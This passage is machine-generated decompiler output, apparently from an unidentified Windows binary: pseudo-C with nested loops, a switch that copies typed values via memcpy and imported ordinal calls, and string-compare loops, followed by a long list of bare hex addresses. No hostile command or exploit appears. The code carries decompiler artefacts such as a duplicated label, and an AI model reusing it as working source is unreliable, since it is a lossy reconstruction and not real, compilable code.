																	__eflags =  *((short*)(_t1717 + 8)) - 0x41;
																	_v212 = _t1362 + 1;
																	if( *((short*)(_t1717 + 8)) == 0x41) {
																		_v212 = _v212 + 2;
																	}
																	L51:
																	_t1611 = _v144;
																	__eflags = _t1611 - _t1412;
																	if(_t1611 == _t1412) {
																		goto L57;
																	}
																	_t1796 = _a8;
																	_t1330 =  *((intOrPtr*)( *((intOrPtr*)(_t1796 + 4)) + _t1611 * 4));
																	__eflags =  *((intOrPtr*)(_t1330 + 8)) - 0x40;
																	if( *((intOrPtr*)(_t1330 + 8)) != 0x40) {
																		L354:
																		_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1796 + 4)) + _t1611 * 4)) + 0xa)));
																		_push(0x6f);
																		goto L623;
																	}
																	_t1332 = _t1611 + 1;
																	__eflags = _t1332 - _v208;
																	if(_t1332 == _v208) {
																		goto L354;
																	} else {
																		_t1611 = _t1332;
																		_v144 = _t1611;
																		_t1335 =  *((intOrPtr*)( *(_v148 + 4) + _v212 * 4));
																		__eflags =  *((intOrPtr*)(_t1335 + 8)) - 0x40;
																		if( *((intOrPtr*)(_t1335 + 8)) == 0x40) {
																			_t139 =  &_v212;
																			 *_t139 = _v212 + 1;
																			__eflags =  *_t139;
																		}
																		_t1337 = _v108 + 1;
																		_v108 = _t1337;
																		__eflags = _t1337 - _v136;
																		if(_t1337 < _v136) {
																			continue;
																		}
																		goto L57;
																	}
																}
															}
															_t1414 = _t1358;
															_t1364 = _v188;
															 *(_t1414 + 8) = _t1364;
															 *(_t1414 + 0xc) = 0;
															__eflags = _t1364 - 1;
															if(_t1364 != 1) {
																_t1365 = _t1364 - 1;
																__eflags = _t1365 - 0xb;
																if(__eflags > 0) {
																	L336:
																	_t1728 = _v176;
																	_t1799 = _v172;
																	L48:
																	_t1359 = _t1414;
																	goto L49;
																}
																switch( *((intOrPtr*)(_t1365 * 4 +  &M00FBAE32))) {
																	case 0:
																		goto L47;
																	case 1:
																		__eax = _v196;
																		 *__ebx = _v196;
																		__ecx = _v192;
																		__ebx[1] = __ecx;
																		goto L48;
																	case 2:
																		__fp0 = _v196;
																		 *__ebx = __fp0;
																		goto L48;
																	case 3:
																		_push(0x10);
																		_t1366 = E00FA14F7(_t1728, _t1799, __eflags);
																		_t1809 = _t1809 + 4;
																		__eflags = _t1366;
																		if(_t1366 == 0) {
																			 *(_t1414 + 0xc) = 0;
																		} else {
																			_t1589 = _v184;
																			 *_t1366 =  *_t1589;
																			 *((intOrPtr*)(_t1366 + 4)) =  *((intOrPtr*)(_t1589 + 4));
																			 *((intOrPtr*)(_t1366 + 8)) =  *((intOrPtr*)(_t1589 + 8));
																			_t1590 =  *((intOrPtr*)(_t1589 + 0xc));
																			 *((intOrPtr*)(_t1366 + 0xc)) = _t1590;
																			 *_t1590 =  *_t1590 + 1;
																			 *(_t1414 + 0xc) = _t1366;
																		}
																		goto L48;
																	case 4:
																		_push(0x214);
																		__eax = E00FA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			__eax = 0;
																			__eflags = 0;
																		} else {
																			__esi = _v196;
																			__ecx = 0x85;
																			__edi = __eax;
																			__eax = memcpy(__eax, __esi, 0x85 << 2);
																			__edi = __esi + __ecx;
																			__edi = __esi + __ecx + __ecx;
																			__ecx = 0;
																		}
																		 *__ebx = __eax;
																		__eflags =  *(__eax + 4);
																		if( *(__eax + 4) != 0) {
																			__eax =  *(__eax + 4);
																			 *__eax =  *__eax + 1;
																			__eflags =  *__eax;
																		}
																		goto L336;
																	case 5:
																		__eax = _v196;
																		 *__ebx = _v196;
																		goto L48;
																	case 6:
																		__eflags = _v196;
																		if(__eflags == 0) {
																			goto L336;
																		}
																		_push(0x10);
																		__eax = E00FA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		_push(__eax);
																		 *__ebx = __eax;
																		__imp__#8();
																		__ecx = _v200;
																		__edx =  *__ebx;
																		_push(__ecx);
																		_push( *__ebx);
																		__imp__#10();
																		__eflags = __eax;
																		if(__eax < 0) {
																			__eax =  *__ebx;
																			_push( *__ebx);
																			__imp__#9();
																			__ecx =  *__ebx;
																			_push( *__ebx);
																			__eax = E00FA10FC();
																			__esp = __esp + 4;
																			 *__ebx = 0;
																		}
																		goto L48;
																	case 7:
																		 *__ebx = _v196;
																		goto L48;
																	case 8:
																		_push(0x18);
																		__eax = E00FA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			goto L343;
																		}
																		__ecx = _v196;
																		 *__ebx = __eax;
																		goto L48;
																	case 9:
																		_push(8);
																		__eax = E00FA14F7(__edi, __esi, __eflags);
																		 *__ebx = __eax;
																		__edx = _v196;
																		__ecx =  *_v196;
																		 *__eax =  *_v196;
																		__edx =  *__ebx;
																		__eax =  *( *__ebx);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eflags == 0) {
																			_push(1);
																			__eax = E00FA14F7(__edi, __esi, __eflags);
																			__ecx =  *__ebx;
																			 *(__ecx + 4) = __eax;
																			__edx =  *__ebx;
																			__eax =  *(__edx + 4);
																			__esp = __esp + 4;
																			 *( *(__edx + 4)) = 0;
																		} else {
																			_push(__eax);
																			__eax = E00FA14F7(__edi, __esi, __eflags);
																			__ecx =  *__ebx;
																			 *( *__ebx + 4) = __eax;
																			__eax =  *__ebx;
																			__edx =  *__eax;
																			__ecx = _v196;
																			__eax =  *(__eax + 4);
																			__esp = __esp + 4;
																			__edx =  *(_v196 + 4);
																			__eax = E00FA0D80(__eax,  *(_v196 + 4),  *(_v196 + 4));
																		}
																		goto L48;
																	case 0xa:
																		_push(0x14);
																		__eax = E00FA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			L343:
																			__eax = 0;
																			 *__ebx = 0;
																			goto L48;
																		}
																		__ecx = _v196;
																		 *__ebx = __eax;
																		goto L48;
																}
															}
															L47:
															 *_t1414 = _v196;
															goto L48;
														}
													}
													goto L57;
												}
											}
											__eflags = _t978 - _t1444;
											if(_t978 <= _t1444) {
												goto L296;
											} else {
												_t1379 = (_t978 << 4) +  *0x103912c;
												__eflags = _t1379;
												_v148 = _t1379;
												goto L28;
											}
										}
									}
								}
								_t1593 = _v200 + 1;
								__eflags = _t1593;
								_v136 = _t1593;
								goto L287;
							}
							_v116 = _v200 - 1;
							L287:
							__eflags = _v136 - _v116;
						} while (_v136 <= _v116);
						goto L288;
					}
					_t1763 =  *(_t956 + 0x134);
					if(_t1763 != 0) {
						_v200 = _t1763;
						do {
							_t1725 =  *((intOrPtr*)(_t1763 + 4));
							if(_t1725 != _v176) {
								goto L268;
							}
							if(_t1725 == 0) {
								L15:
								_t1382 = _v168;
								 *_t1382 =  *_t1382 - 1;
								if( *_t1382 == 0) {
									_push(_v180);
									E00FA10FC();
									_push(_v168);
									E00FA10FC();
									_t1809 = _t1809 + 8;
								}
								goto L17;
							} else {
								_t1595 = _v180;
								_t1385 =  *_t1763;
								L12:
								L12:
								if( *_t1385 !=  *_t1595) {
									_t1763 = _v200;
								} else {
									goto L13;
								}
								goto L268;
								L13:
								_t1385 = _t1385 + 2;
								_t1595 =  &(_t1595[1]);
								_t1725 = _t1725 - 1;
								if(_t1725 != 0) {
									goto L12;
								} else {
									_t1763 = _v200;
									goto L15;
								}
							}
							L268:
							_t1763 =  *(_t1763 + 0x20);
							_v200 = _t1763;
							__eflags = _t1763;
						} while (__eflags != 0);
					}
					goto L288;
				}
			}

































































































































































































































































































              0x00f998f0
              0x00f998fd
              0x00f99905
              0x00f9990e
              0x00f99911
              0x00f99916
              0x00f99919
              0x00f9991d
              0x00f9991e
              0x00fb970e
              0x00f99924
              0x00f9992e
              0x00f9992e
              0x00f9992e
              0x00f99932
              0x00f99944
              0x00f99958
              0x00f9995c
              0x00f99964
              0x00f99966
              0x00f9996b
              0x00f99970
              0x00fb9718
              0x00f99976
              0x00f99976
              0x00f99976
              0x00f99986
              0x00f9998a
              0x00fb97ee
              0x00fb97f2
              0x00000000
              0x00f99990
              0x00f99993
              0x00fb9723
              0x00fb9729
              0x00fb9734
              0x00fb9747
              0x00fb974f
              0x00fb9759
              0x00fb9769
              0x00fb976e
              0x00fb9771
              0x00fb9771
              0x00f999a3
              0x00f999a9
              0x00f999ac
              0x00f999b4
              0x00fb978c
              0x00fb978c
              0x00fb978d
              0x00000000
              0x00000000
              0x00fb9793
              0x00fb979b
              0x00fb979f
              0x00fb97aa
              0x00fb97b2
              0x00fb97bf
              0x00fb97c1
              0x00fb97d5
              0x00fb980f
              0x00fb9813
              0x00000000
              0x00000000
              0x00fb9819
              0x00fb9820
              0x00f99a2b
              0x00f99a2b
              0x00f99a2f
              0x00fb97f7
              0x00fb9801
              0x00f9a8af
              0x00f9a8b5
              0x00f9a8b5
              0x00f99a3b
              0x00f99a42
              0x00f99a44
              0x00f99a48
              0x00f99a55
              0x00f99a62
              0x00f99a63
              0x00f99a68
              0x00f99a71
              0x00f99a75
              0x00f99a7d
              0x00f99a89
              0x00f99a91
              0x00f99a95
              0x00f99a99
              0x00f99a9d
              0x00f99aa5
              0x00f99aa9
              0x00f99aad
              0x00f99ab1
              0x00fb977a
              0x00fb977e
              0x00fb9780
              0x00fbae08
              0x00fbae08
              0x00000000
              0x00f99ab7
              0x00f99ab7
              0x00f99ab8
              0x00f99abc
              0x00f99abe
              0x00f99ac2
              0x00f99ac4
              0x00f99ac8
              0x00f99ac8
              0x00f99ad0
              0x00f99ad7
              0x00f99ad7
              0x00f99ad9
              0x00f99ad9
              0x00f99ac8
              0x00f99ac8
              0x00f99ad0
              0x00f99ad7
              0x00f99ad7
              0x00000000
              0x00f99ad7
              0x00000000
              0x00f99adc
              0x00f99adc
              0x00f99adc
              0x00f99adf
              0x00fb9853
              0x00000000
              0x00fb9853
              0x00f99ae5
              0x00f99ae5
              0x00f99ae6
              0x00fb982a
              0x00fb982d
              0x00000000
              0x00000000
              0x00fb9843
              0x00fb9844
              0x00fb9846
              0x00000000
              0x00fb9846
              0x00f99aec
              0x00f99aee
              0x00fb984c
              0x00fb984d
              0x00000000
              0x00fb984d
              0x00f99af4
              0x00f99af9
              0x00f99afb
              0x00f99b02
              0x00f99b08
              0x00fb9859
              0x00fb9859
              0x00f99b23
              0x00f99b23
              0x00f99b27
              0x00f99b2b
              0x00f99cf2
              0x00f99cf2
              0x00f99cf6
              0x00f99cfa
              0x00fbadfd
              0x00fbae01
              0x00fbae02
              0x00000000
              0x00fbae02
              0x00f99d00
              0x00f99d04
              0x00000000
              0x00000000
              0x00f99d0a
              0x00f99d0e
              0x00000000
              0x00000000
              0x00f99d14
              0x00f99d1b
              0x00f99d1f
              0x00f99d27
              0x00f99d2b
              0x00f99d2f
              0x00f99d33
              0x00f99d35
              0x00fb9c78
              0x00fb9c78
              0x00f99d3b
              0x00f99d41
              0x00fb9c81
              0x00fb9c87
              0x00fb9c8d
              0x00fb9c93
              0x00fb9c96
              0x00f99d47
              0x00f99d47
              0x00f99d49
              0x00f99d4e
              0x00f99d51
              0x00f99d53
              0x00fb9d24
              0x00f99d59
              0x00f99d59
              0x00f99d5b
              0x00f99d5d
              0x00f99d61
              0x00f99d64
              0x00f99d68
              0x00fb9ca2
              0x00fb9ca2
              0x00f99d6e
              0x00f99d72
              0x00f99d74
              0x00fb9caa
              0x00fb9cac
              0x00fb9cb0
              0x00fb9cb5
              0x00fb9cb8
              0x00fb9cba
              0x00fb9ccb
              0x00fb9ccb
              0x00fb9cc0
              0x00fb9cc1
              0x00fb9cc1
              0x00fb9cd4
              0x00fb9cd6
              0x00fb9cdd
              0x00fb9ce4
              0x00fb9cec
              0x00fb9cf3
              0x00fb9cf8
              0x00fb9d07
              0x00fb9d0c
              0x00fb9d18
              0x00fb9d1d
              0x00f99d7a
              0x00f99d7a
              0x00f99d7a
              0x00f99d74
              0x00f99d7c
              0x00f99d82
              0x00f99d85
              0x00f99d85
              0x00f99d8b
              0x00f99d8f
              0x00f99d95
              0x00f99d97
              0x00fb9d2b
              0x00fb9d2d
              0x00fb9d30
              0x00fb9d32
              0x00fb9d3d
              0x00fb9d3d
              0x00fb9d42
              0x00fb9d45
              0x00fb9d47
              0x00fb9d52
              0x00fb9d52
              0x00fb9d57
              0x00fb9d5b
              0x00fb9d61
              0x00fb9d64
              0x00fb9d66
              0x00fb9d6e
              0x00fb9d6e
              0x00fb9d66
              0x00fb9d74
              0x00fb9d74
              0x00f99da2
              0x00f99da6
              0x00f9a229
              0x00f9a229
              0x00f9a235
              0x00f9a23c
              0x00f9a243
              0x00f9a24a
              0x00f9a251
              0x00f9a258
              0x00f9a25f
              0x00f9a266
              0x00f9a26f
              0x00f9a275
              0x00f9a27c
              0x00f9a283
              0x00f9a286
              0x00f9a28b
              0x00f9a28f
              0x00fba3ae
              0x00fba3b3
              0x00f9a295
              0x00f9a295
              0x00f9a297
              0x00f9a29c
              0x00f9a29f
              0x00f9a2a1
              0x00fba3f4
              0x00f9a2a7
              0x00f9a2a7
              0x00f9a2ae
              0x00f9a2b1
              0x00f9a2b4
              0x00f9a2b6
              0x00f9a2b9
              0x00f9a2bc
              0x00f9a2bf
              0x00f9a2c2
              0x00f9a2c5
              0x00f9a2c8
              0x00f9a2c8
              0x00f9a2ce
              0x00f9a2d1
              0x00f9a2d1
              0x00f9a2d4
              0x00f9a2df
              0x00f9a2e5
              0x00f9a2ec
              0x00f9a2ee
              0x00f9a2f2
              0x00f9a2f7
              0x00f9a2f9
              0x00fba3fb
              0x00fba3fb
              0x00fba400
              0x00fba400
              0x00000000
              0x00f9a2ff
              0x00f9a2ff
              0x00f9a303
              0x00f9a307
              0x00f9a30d
              0x00f9a310
              0x00f9a315
              0x00f9a319
              0x00f9a31c
              0x00fba409
              0x00fba409
              0x00f9a322
              0x00f9a326
              0x00fba631
              0x00fba634
              0x00fba637
              0x00fba63c
              0x00fba643
              0x00000000
              0x00f9a32c
              0x00f9a32f
              0x00f9a334
              0x00f9a337
              0x00f9a33c
              0x00f9a340
              0x00fba414
              0x00f9a346
              0x00f9a346
              0x00f9a346
              0x00f9a349
              0x00f9a34c
              0x00f9a34e
              0x00f9a3db
              0x00f9a3db
              0x00f9a3dd
              0x00f9a3e0
              0x00f9a3e5
              0x00f9a3e9
              0x00f9a3ed
              0x00fba626
              0x00fba626
              0x00f9a3f3
              0x00f9a3f7
              0x00fba650
              0x00fba655
              0x00fba658
              0x00fba658
              0x00f9a3fd
              0x00f9a401
              0x00fba667
              0x00f9a407
              0x00f9a407
              0x00f9a407
              0x00f9a40a
              0x00f9a40e
              0x00fba681
              0x00fba681
              0x00f9a414
              0x00f9a419
              0x00f9a41c
              0x00f9a421
              0x00f9a425
              0x00fba68b
              0x00fba68e
              0x00fba691
              0x00fba693
              0x00fba69a
              0x00fba69a
              0x00fba69f
              0x00fba6a2
              0x00fba6a2
              0x00f9a42b
              0x00f9a42f
              0x00fba6ab
              0x00000000
              0x00f9a435
              0x00f9a435
              0x00f9a43b
              0x00f9a43f
              0x00f9a441
              0x00f9a501
              0x00f9a505
              0x00f9a508
              0x00f9a50c
              0x00f9a50c
              0x00f9a510
              0x00f9a513
              0x00f9a517
              0x00f9a519
              0x00f9a51d
              0x00fba7d3
              0x00fba7d3
              0x00f9a52a
              0x00f9a52d
              0x00f9a531
              0x00f9a534
              0x00fba7db
              0x00fba7db
              0x00f9a53a
              0x00f9a543
              0x00f9a545
              0x00f9a549
              0x00f9a54d
              0x00fba7e6
              0x00f9a553
              0x00f9a553
              0x00f9a553
              0x00f9a556
              0x00f9a556
              0x00f9a560
              0x00f9a562
              0x00f9a5c1
              0x00f9a5c1
              0x00000000
              0x00f9a564
              0x00f9a564
              0x00f9a567
              0x00f9a569
              0x00fba7ef
              0x00fba7f4
              0x00fba7f4
              0x00f9a56f
              0x00f9a572
              0x00f9a575
              0x00fba800
              0x00fba802
              0x00fba804
              0x00000000
              0x00000000
              0x00fba80b
              0x00fba813
              0x00fba814
              0x00fba819
              0x00000000
              0x00f9a57b
              0x00f9a57b
              0x00f9a57b
              0x00f9a57e
              0x00fba821
              0x00fba823
              0x00fba825
              0x00fba82c
              0x00fba82c
              0x00f9a584
              0x00f9a584
              0x00f9a587
              0x00fba838
              0x00f9a58d
              0x00f9a58d
              0x00f9a590
              0x00fba847
              0x00fba848
              0x00fba852
              0x00fba853
              0x00fba858
              0x00f9a596
              0x00f9a596
              0x00f9a599
              0x00fba860
              0x00fba862
              0x00fba864
              0x00fba86b
              0x00fba86b
              0x00fba864
              0x00f9a599
              0x00f9a590
              0x00f9a587
              0x00f9a59f
              0x00f9a59f
              0x00f9a5a6
              0x00f9a5ac
              0x00f9a5af
              0x00f9a5b2
              0x00fba875
              0x00fba876
              0x00fba879
              0x00000000
              0x00000000
              0x00fba87f
              0x00000000
              0x00000000
              0x00000000
              0x00fba894
              0x00fba896
              0x00000000
              0x00000000
              0x00fba89e
              0x00fba8a5
              0x00000000
              0x00000000
              0x00fba8ac
              0x00fba8ae
              0x00fba8b3
              0x00fba8b6
              0x00fba8b8
              0x00fba8e5
              0x00fba8e7
              0x00fba8be
              0x00fba8be
              0x00fba8c5
              0x00fba8c7
              0x00fba8c9
              0x00fba8cc
              0x00fba8cf
              0x00fba8d2
              0x00fba8d5
              0x00fba8d8
              0x00fba8db
              0x00fba8dd
              0x00fba8dd
              0x00000000
              0x00000000
              0x00fba8fd
              0x00fba902
              0x00fba907
              0x00fba90a
              0x00fba90c
              0x00fba927
              0x00fba927
              0x00fba912
              0x00fba912
              0x00fba919
              0x00fba91e
              0x00fba920
              0x00fba920
              0x00fba920
              0x00fba920
              0x00fba929
              0x00fba92d
              0x00fba92f
              0x00fba933
              0x00fba939
              0x00fba93c
              0x00fba93c
              0x00f9a5c5
              0x00f9a5c5
              0x00f9a5c9
              0x00f9a5cd
              0x00fbaa5b
              0x00f9a5d3
              0x00f9a5d3
              0x00f9a5d3
              0x00f9a5d6
              0x00f9a5da
              0x00f9a5e1
              0x00fbaa63
              0x00fbaa68
              0x00fbaa6c
              0x00fbaa71
              0x00fbaa73
              0x00fbaa79
              0x00f9a5e7
              0x00f9a5e7
              0x00f9a5e7
              0x00f9a5ed
              0x00f9a5f4
              0x00fbaa85
              0x00fbaa89
              0x00000000
              0x00f9a5fa
              0x00f9a5fa
              0x00f9a5ff
              0x00f9a603
              0x00f9a607
              0x00f9a609
              0x00f9a6d5
              0x00f9a6d9
              0x00f9a6dd
              0x00f9a6de
              0x00f9a6e7
              0x00f9a6ea
              0x00f9a6f0
              0x00f9a6f7
              0x00f9a6fe
              0x00f9a707
              0x00f9a70d
              0x00f9a714
              0x00f9a716
              0x00fbab34
              0x00fbab39
              0x00fbab39
              0x00f9a71c
              0x00f9a723
              0x00f9a726
              0x00fbab49
              0x00fbab50
              0x00fbab52
              0x00fbab58
              0x00fbab59
              0x00fbab5f
              0x00fbab60
              0x00fbab65
              0x00fbab65
              0x00f9a72c
              0x00f9a72c
              0x00f9a72f
              0x00fbab6d
              0x00fbab74
              0x00fbab76
              0x00fbab7d
              0x00fbab7d
              0x00f9a735
              0x00f9a735
              0x00f9a738
              0x00fbab8e
              0x00f9a73e
              0x00f9a73e
              0x00f9a741
              0x00fbab98
              0x00fbaba2
              0x00fbaba3
              0x00fbabab
              0x00fbabac
              0x00fbabb1
              0x00f9a747
              0x00f9a747
              0x00f9a74a
              0x00fbabb9
              0x00fbabc0
              0x00fbabc2
              0x00fbabc9
              0x00fbabc9
              0x00fbabc2
              0x00f9a74a
              0x00f9a741
              0x00f9a738
              0x00f9a72f
              0x00f9a750
              0x00f9a757
              0x00f9a75e
              0x00f9a765
              0x00f9a76c
              0x00f9a773
              0x00f9a775
              0x00fbabd4
              0x00fbabd9
              0x00fbabe4
              0x00fbabe9
              0x00fbabe9
              0x00f9a77b
              0x00f9a77e
              0x00fbabf0
              0x00fbabf7
              0x00fbabfd
              0x00fbac04
              0x00fbac05
              0x00fbac0b
              0x00fbac0c
              0x00fbac11
              0x00fbac14
              0x00fbac19
              0x00fbac19
              0x00f9a784
              0x00f9a784
              0x00f9a787
              0x00fbac20
              0x00fbac27
              0x00fbac35
              0x00fbac3a
              0x00fbac3f
              0x00fbac3f
              0x00f9a78d
              0x00f9a78d
              0x00f9a790
              0x00fbac4d
              0x00fbac52
              0x00fbac57
              0x00f9a796
              0x00f9a796
              0x00f9a799
              0x00fbac5e
              0x00fbac68
              0x00fbac69
              0x00fbac71
              0x00fbac72
              0x00fbac77
              0x00fbac7a
              0x00fbac7f
              0x00f9a79f
              0x00f9a79f
              0x00f9a7a2
              0x00fbac86
              0x00fbac8d
              0x00fbac9b
              0x00fbaca0
              0x00fbaca5
              0x00fbaca5
              0x00fbac8d
              0x00f9a7a2
              0x00f9a799
              0x00f9a790
              0x00f9a787
              0x00f9a7a8
              0x00f9a7ac
              0x00f9a7ae
              0x00fbacad
              0x00fbacb2
              0x00fbacba
              0x00fbacbf
              0x00fbacbf
              0x00f9a7b4
              0x00f9a7b8
              0x00f9a7bb
              0x00fbacc6
              0x00fbacca
              0x00fbaccc
              0x00fbacd2
              0x00fbacd3
              0x00fbacdd
              0x00fbacde
              0x00fbace3
              0x00fbace6
              0x00fbaceb
              0x00fbaceb
              0x00f9a7c1
              0x00f9a7c1
              0x00f9a7c4
              0x00fbacf2
              0x00fbacf6
              0x00fbacf8
              0x00fbacff
              0x00fbad04
              0x00fbad09
              0x00fbad09
              0x00f9a7ca
              0x00f9a7ca
              0x00f9a7cd
              0x00fbad14
              0x00fbad19
              0x00fbad1e
              0x00f9a7d3
              0x00f9a7d3
              0x00f9a7d6
              0x00fbad2c
              0x00fbad2d
              0x00fbad39
              0x00fbad3a
              0x00fbad3f
              0x00fbad42
              0x00fbad47
              0x00f9a7dc
              0x00f9a7dc
              0x00f9a7df
              0x00fbad4e
              0x00fbad52
              0x00fbad54
              0x00fbad5b
              0x00fbad60
              0x00fbad65
              0x00fbad65
              0x00fbad54
              0x00f9a7df
              0x00f9a7d6
              0x00f9a7cd
              0x00f9a7c4
              0x00f9a7e5
              0x00f9a7e9
              0x00f9a7ed
              0x00f9a7ef
              0x00f9a804
              0x00f9a808
              0x00f9a809
              0x00f9a80e
              0x00f9a811
              0x00f9a816
              0x00f9a8a0
              0x00f9a8a4
              0x00f9a8a5
              0x00f9a8ad
              0x00f9a8ad
              0x00000000
              0x00f9a81c
              0x00f9a81c
              0x00f9a81c
              0x00f9a820
              0x00f9a824
              0x00f9a827
              0x00f9a829
              0x00000000
              0x00000000
              0x00f9a82b
              0x00f9a82e
              0x00f9a830
              0x00f9a835
              0x00f9a83a
              0x00f9a83d
              0x00fbad6e
              0x00fbad6f
              0x00fbad7a
              0x00fbad7b
              0x00fbad80
              0x00fbad80
              0x00f9a843
              0x00f9a844
              0x00f9a849
              0x00f9a84c
              0x00f9a84c
              0x00f9a853
              0x00f9a856
              0x00f9a859
              0x00fbad88
              0x00fbad8a
              0x00fbad8c
              0x00000000
              0x00000000
              0x00fbad92
              0x00fbad93
              0x00fbad9b
              0x00fbad9c
              0x00fbada1
              0x00000000
              0x00f9a85f
              0x00f9a85f
              0x00f9a85f
              0x00f9a862
              0x00fbada9
              0x00fbadab
              0x00fbadad
              0x00fbadb4
              0x00fbadb4
              0x00f9a868
              0x00f9a868
              0x00f9a86b
              0x00fbadc0
              0x00f9a871
              0x00f9a871
              0x00f9a874
              0x00fbadcf
              0x00fbadd0
              0x00fbadda
              0x00fbaddb
              0x00fbade0
              0x00f9a87a
              0x00f9a87a
              0x00f9a87d
              0x00fbade8
              0x00fbadea
              0x00fbadec
              0x00fbadf3
              0x00fbadf3
              0x00fbadec
              0x00f9a87d
              0x00f9a874
              0x00f9a86b
              0x00f9a883
              0x00f9a883
              0x00f9a884
              0x00f9a88b
              0x00f9a891
              0x00f9a896
              0x00f9a896
              0x00f9a899
              0x00f9a899
              0x00f9a89a
              0x00f9a89a
              0x00000000
              0x00f9a820
              0x00f9a7f1
              0x00f9a7f1
              0x00f9a7f1
              0x00f9a7f3
              0x00f9a7f6
              0x00f9a7f7
              0x00f9a7fc
              0x00f9a7fd
              0x00f9a800
              0x00f9a800
              0x00000000
              0x00f9a7f3
              0x00f9a60f
              0x00f9a60f
              0x00f9a612
              0x00f9a614
              0x00f9a616
              0x00f9a619
              0x00f9a619
              0x00f9a61e
              0x00f9a621
              0x00f9a623
              0x00fbaa98
              0x00fbaa98
              0x00f9a629
              0x00f9a62d
              0x00f9a6a4
              0x00f9a6a7
              0x00f9a6ac
              0x00f9a6af
              0x00f9a6b3
              0x00f9a6b4
              0x00f9a6bf
              0x00f9a6c0
              0x00f9a6c5
              0x00f9a6c5
              0x00f9a6c8
              0x00f9a6c9
              0x00f9a6ce
              0x00f9a6d2
              0x00000000
              0x00f9a62f
              0x00f9a62f
              0x00f9a632
              0x00f9a634
              0x00000000
              0x00000000
              0x00f9a636
              0x00f9a639
              0x00f9a63b
              0x00f9a640
              0x00f9a645
              0x00f9a648
              0x00fbaaa4
              0x00fbaaa5
              0x00fbaab0
              0x00fbaab1
              0x00fbaab6
              0x00fbaab6
              0x00f9a64e
              0x00f9a64f
              0x00f9a654
              0x00f9a657
              0x00f9a657
              0x00f9a65e
              0x00f9a661
              0x00f9a664
              0x00fbaabe
              0x00fbaac0
              0x00fbaac2
              0x00000000
              0x00000000
              0x00fbaac8
              0x00fbaac9
              0x00fbaad1
              0x00fbaad2
              0x00fbaad7
              0x00000000
              0x00f9a66a
              0x00f9a66a
              0x00f9a66a
              0x00f9a66d
              0x00fbaadf
              0x00fbaae1
              0x00fbaae3
              0x00fbaaea
              0x00fbaaea
              0x00f9a673
              0x00f9a673
              0x00f9a676
              0x00fbaaf6
              0x00f9a67c
              0x00f9a67c
              0x00f9a67f
              0x00fbab05
              0x00fbab06
              0x00fbab10
              0x00fbab11
              0x00fbab16
              0x00f9a685
              0x00f9a685
              0x00f9a688
              0x00fbab1e
              0x00fbab20
              0x00fbab22
              0x00fbab29
              0x00fbab29
              0x00fbab22
              0x00f9a688
              0x00f9a67f
              0x00f9a676
              0x00f9a68e
              0x00f9a68e
              0x00f9a68f
              0x00f9a696
              0x00f9a69c
              0x00f9a6a1
              0x00000000
              0x00f9a6a1
              0x00f9a664
              0x00f9a62d
              0x00f9a609
              0x00000000
              0x00fba8ef
              0x00fba8f6
              0x00000000
              0x00000000
              0x00fba943
              0x00fba94a
              0x00fba94c
              0x00fba952
              0x00fba954
              0x00fba959
              0x00fba95c
              0x00fba95d
              0x00fba95f
              0x00fba965
              0x00fba967
              0x00fba968
              0x00fba969
              0x00fba96f
              0x00fba971
              0x00fba977
              0x00fba979
              0x00fba97a
              0x00fba980
              0x00fba982
              0x00fba983
              0x00fba988
              0x00fba98b
              0x00fba98b
              0x00fba971
              0x00000000
              0x00000000
              0x00fba99d
              0x00000000
              0x00000000
              0x00fba9a4
              0x00fba9a6
              0x00fba9ab
              0x00fba9ae
              0x00fba9b0
              0x00000000
              0x00000000
              0x00fba9b6
              0x00fba9bf
              0x00000000
              0x00000000
              0x00fba9d0
              0x00fba9d2
              0x00fba9d7
              0x00fba9de
              0x00fba9e0
              0x00fba9e2
              0x00fba9e4
              0x00fba9e6
              0x00fba9e8
              0x00fba9eb
              0x00fba9ed
              0x00fbaa1b
              0x00fbaa1d
              0x00fbaa22
              0x00fbaa24
              0x00fbaa27
              0x00fbaa29
              0x00fbaa2c
              0x00fbaa2f
              0x00fba9f3
              0x00fba9f3
              0x00fba9f4
              0x00fba9f9
              0x00fba9fb
              0x00fba9fe
              0x00fbaa00
              0x00fbaa02
              0x00fbaa05
              0x00fbaa08
              0x00fbaa0e
              0x00fbaa13
              0x00000000
              0x00000000
              0x00fbaa37
              0x00fbaa39
              0x00fbaa3e
              0x00fbaa41
              0x00fbaa43
              0x00fba9c9
              0x00fba9c9
              0x00f9a5bf
              0x00f9a5bf
              0x00000000
              0x00f9a5bf
              0x00fbaa45
              0x00fbaa4e
              0x00000000
              0x00000000
              0x00fba87f
              0x00f9a5b8
              0x00f9a5b8
              0x00000000
              0x00f9a5b8
              0x00f9a575
              0x00f9a562
              0x00f9a447
              0x00f9a44a
              0x00f9a44c
              0x00fba6b5
              0x00fba6ba
              0x00fba6ba
              0x00f9a452
              0x00f9a455
              0x00f9a458
              0x00fba6c6
              0x00fba6c9
              0x00fba6cb
              0x00000000
              0x00000000
              0x00fba6d2
              0x00fba6db
              0x00fba6dc
              0x00fba6e1
              0x00000000
              0x00f9a45e
              0x00f9a45e
              0x00f9a45e
              0x00f9a461
              0x00fba6e9
              0x00fba6ec
              0x00fba6ee
              0x00fba6f5
              0x00fba6f5
              0x00f9a467
              0x00f9a467
              0x00f9a46a
              0x00fba6ff
              0x00fba702
              0x00f9a470
              0x00f9a470
              0x00f9a473
              0x00fba712
              0x00fba713
              0x00fba71e
              0x00fba71f
              0x00fba724
              0x00f9a479
              0x00f9a479
              0x00f9a47c
              0x00fba72c
              0x00fba72f
              0x00fba731
              0x00fba738
              0x00fba738
              0x00fba731
              0x00f9a47c
              0x00f9a473
              0x00f9a46a
              0x00f9a482
              0x00f9a482
              0x00f9a489
              0x00f9a490
              0x00f9a493
              0x00f9a495
              0x00f9a49a
              0x00f9a49f
              0x00f9a4a2
              0x00fba744
              0x00fba745
              0x00fba750
              0x00fba751
              0x00fba756
              0x00fba756
              0x00f9a4a8
              0x00f9a4a9
              0x00f9a4ae
              0x00f9a4b1
              0x00f9a4b1
              0x00f9a4b8
              0x00f9a4bb
              0x00f9a4be
              0x00fba75e
              0x00fba760
              0x00fba762
              0x00000000
              0x00000000
              0x00fba769
              0x00fba771
